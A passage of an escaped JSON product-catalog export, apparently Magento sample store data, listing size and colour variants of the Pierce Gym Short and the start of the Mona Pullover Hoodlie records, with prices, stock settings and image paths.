in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"975\":{\"sku\":\"MSH12-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-34-Black\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"976\":{\"sku\":\"MSH12-34-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-34-Gray\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-34-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Gray\"},\"977\":{\"sku\":\"MSH12-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-34-Red\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"978\":{\"sku\":\"MSH12-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-36-Black\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"979\":{\"sku\":\"MSH12-36-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-36-Gray\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-36-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Gray\"},\"980\":{\"sku\":\"MSH12-36-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short-36-Red\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"pierce-gym-short-36-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Red\"},\"981\":{\"sku\":\"MSH12\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Men Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Pierce Gym Short\",\"description\":\"<p>The Pierce Gym Short is similar to our Arcadio Gym Short, but designed with a fitted, tapered look. A flat waistband with an adjustable drawstring adds comfort, with zippered pockets for safe, easy storage.<\\/p>\\n<p>&bull; Dark red cotton shorts. <br \\/>&bull; 87% Supplex, 13% Lycra.<br \\/>&bull; Adjustable drawstring waistband.<br \\/>&bull; Built-in mesh brief.<br \\/>&bull; Machine wash cold, tumble dry low.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"27\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Workout Pants|Base Layer|Compression|Tights,material=LumaTech&trade;|Mesh|Spandex,pattern=Solid,climate=Indoor|Hot|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MSH12-32-Black,size=32,color=Black|sku=MSH12-32-Gray,size=32,color=Gray|sku=MSH12-32-Red,size=32,color=Red|sku=MSH12-33-Black,size=33,color=Black|sku=MSH12-33-Gray,size=33,color=Gray|sku=MSH12-33-Red,size=33,color=Red|sku=MSH12-34-Black,size=34,color=Black|sku=MSH12-34-Gray,size=34,color=Gray|sku=MSH12-34-Red,size=34,color=Red|sku=MSH12-36-Black,size=36,color=Black|sku=MSH12-36-Gray,size=36,color=Gray|sku=MSH12-36-Red,size=36,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"image\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh12-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh12-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Workout Pants|Base Layer|Compression|Tights\",\"material\":\"LumaTech&trade;|Mesh|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"982\":{\"sku\":\"WH01-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XS-Green\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"983\":{\"sku\":\"WH01-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simpl